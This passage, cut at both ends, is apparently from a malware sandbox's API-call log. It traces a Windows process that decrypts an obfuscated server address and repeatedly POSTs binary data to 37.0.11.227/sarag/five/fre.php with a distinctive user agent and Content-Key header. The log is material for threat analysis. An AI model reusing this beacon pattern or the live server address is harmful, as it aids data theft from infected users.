RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0268.328] socket (af=2, type=1, protocol=6) returned 0x7f0 [0268.328] connect (s=0x7f0, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0268.356] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0268.356] GetProcessHeap () returned 0x690000 [0268.356] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0268.356] GetProcessHeap () returned 0x690000 [0268.356] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0268.357] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0268.358] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0268.358] GetProcessHeap () returned 0x690000 [0268.358] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0268.358] GetProcessHeap () returned 0x690000 [0268.358] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0268.361] GetProcessHeap () returned 0x690000 [0268.361] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0268.361] GetProcessHeap () returned 0x690000 [0268.361] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0268.363] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0268.364] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0268.364] GetProcessHeap () returned 0x690000 [0268.364] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0268.364] GetProcessHeap () returned 0x690000 [0268.365] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0268.365] send (s=0x7f0, buf=0x6ad508*, len=242, flags=0) returned 242 [0268.366] send (s=0x7f0, buf=0x6aba40*, len=159, flags=0) returned 159 [0268.366] GetProcessHeap () returned 0x690000 [0268.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0268.366] recv (in: s=0x7f0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0268.433] GetProcessHeap () returned 0x690000 [0268.434] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0268.434] GetProcessHeap () returned 0x690000 [0268.434] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0268.434] GetProcessHeap () returned 0x690000 [0268.435] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0268.435] GetProcessHeap () returned 0x690000 [0268.435] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0268.435] closesocket (s=0x7f0) returned 0 [0268.436] GetProcessHeap () returned 0x690000 [0268.436] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0268.436] GetProcessHeap () returned 0x690000 [0268.436] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0268.436] GetProcessHeap () returned 0x690000 [0268.437] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0268.437] GetProcessHeap () returned 0x690000 [0268.437] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0268.437] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15a8) returned 0x7f0 [0268.438] Sleep (dwMilliseconds=0xea60) [0268.440] GetProcessHeap () returned 0x690000 [0268.440] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0268.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.441] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0268.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.446] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0268.452] GetProcessHeap () returned 0x690000 [0268.452] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0268.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.453] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0268.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.454] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0268.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.455] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.455] GetProcessHeap () returned 0x690000 [0268.455] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0268.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.456] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0268.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.457] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0268.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.458] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0268.458] GetProcessHeap () returned 0x690000 [0268.458] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0268.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.458] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0268.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.459] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0268.460] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.460] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0268.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.463] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0268.463] GetProcessHeap () returned 0x690000 [0268.463] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0268.463] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0268.463] GetProcessHeap () returned 0x690000 [0268.464] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0268.464] GetProcessHeap () returned 0x690000 [0268.464] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0268.464] GetProcessHeap () returned 0x690000 [0268.464] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0268.464] GetProcessHeap () returned 0x690000 [0268.464] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0268.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.465] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0268.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.470] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0268.476] GetProcessHeap () returned 0x690000 [0268.476] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0268.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.477] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0268.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.478] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0268.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.478] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.478] GetProcessHeap () returned 0x690000 [0268.479] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0268.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.480] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0268.480] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.481] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0268.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.481] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0268.481] GetProcessHeap () returned 0x690000 [0268.481] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0268.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.482] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0268.483] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.483] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0268.484] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.484] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0268.485] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.485] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0268.485] GetProcessHeap () returned 0x690000 [0268.485] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0268.485] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0268.485] GetProcessHeap () returned 0x690000 [0268.485] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0268.485] socket (af=2, type=1, protocol=6) returned 0x7f4 [0268.485] connect (s=0x7f4, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0268.526] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0268.527] GetProcessHeap () returned 0x690000 [0268.527] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0268.527] GetProcessHeap () returned 0x690000 [0268.527] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0268.527] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0268.528] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0268.529] GetProcessHeap () returned 0x690000 [0268.529] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0268.529] GetProcessHeap () returned 0x690000 [0268.529] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0268.529] GetProcessHeap () returned 0x690000 [0268.529] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0268.530] GetProcessHeap () returned 0x690000 [0268.530] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0268.532] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0268.535] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0268.535] GetProcessHeap () returned 0x690000 [0268.535] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0268.535] GetProcessHeap () returned 0x690000 [0268.536] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0268.536] send (s=0x7f4, buf=0x6ad508*, len=242, flags=0) returned 242 [0268.539] send (s=0x7f4, buf=0x6aba40*, len=159, flags=0) returned 159 [0268.540] GetProcessHeap () returned 0x690000 [0268.540] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0268.540] recv (in: s=0x7f4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0268.605] GetProcessHeap () returned 0x690000 [0268.605] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0268.607] GetProcessHeap () returned 0x690000 [0268.607] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0268.607] GetProcessHeap () returned 0x690000 [0268.608] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0268.608] GetProcessHeap () returned 0x690000 [0268.608] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0268.608] closesocket (s=0x7f4) returned 0 [0268.610] GetProcessHeap () returned 0x690000 [0268.610] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0268.610] GetProcessHeap () returned 0x690000 [0268.610] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0268.611] GetProcessHeap () returned 0x690000 [0268.611] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0268.611] GetProcessHeap () returned 0x690000 [0268.611] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0268.611] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15ac) returned 0x7f4 [0268.613] Sleep (dwMilliseconds=0xea60) [0268.615] GetProcessHeap () returned 0x690000 [0268.615] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0268.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.616] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0268.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.624] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0268.632] GetProcessHeap () returned 0x690000 [0268.632] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0268.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.640] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0268.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.641] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0268.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.642] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.642] GetProcessHeap () returned 0x690000 [0268.643] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0268.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.644] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0268.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.645] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0268.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.646] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0268.646] GetProcessHeap () returned 0x690000 [0268.646] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0268.647] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.648] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0268.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.649] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0268.650] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.650] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0268.651] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.651] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0268.651] GetProcessHeap () returned 0x690000 [0268.651] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0268.651] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0268.651] GetProcessHeap () returned 0x690000 [0268.652] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0268.652] GetProcessHeap () returned 0x690000 [0268.652] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0268.652] GetProcessHeap () returned 0x690000 [0268.652] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0268.652] GetProcessHeap () returned 0x690000 [0268.652] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0268.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.654] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0268.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.662] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0268.669] GetProcessHeap () returned 0x690000 [0268.669] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0268.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.670] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0268.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.671] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0268.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.672] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.672] GetProcessHeap () returned 0x690000 [0268.673] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0268.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.674] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0268.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.675] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0268.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0268.676] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0268.676] GetProcessHeap () returned 0x690000 [0268.677] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0268.677] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.678] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0268.679] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.679] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0268.680] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.681] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0268.681] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0268.682] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0268.682] GetProcessHeap () returned 0x690000 [0268.682] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0268.682] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0268.682] GetProcessHeap () returned 0x690000 [0268.682] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab320 [0268.682] socket (af=2, type=1, protocol=6) returned 0x7f8 [0268.682] connect (s=0x7f8, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0268.708] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0268.708] GetProcessHeap () returned 0x690000 [0268.708] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0268.708] GetProcessHeap () returned 0x690000 [0268.708] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0268.709] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0268.710] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: 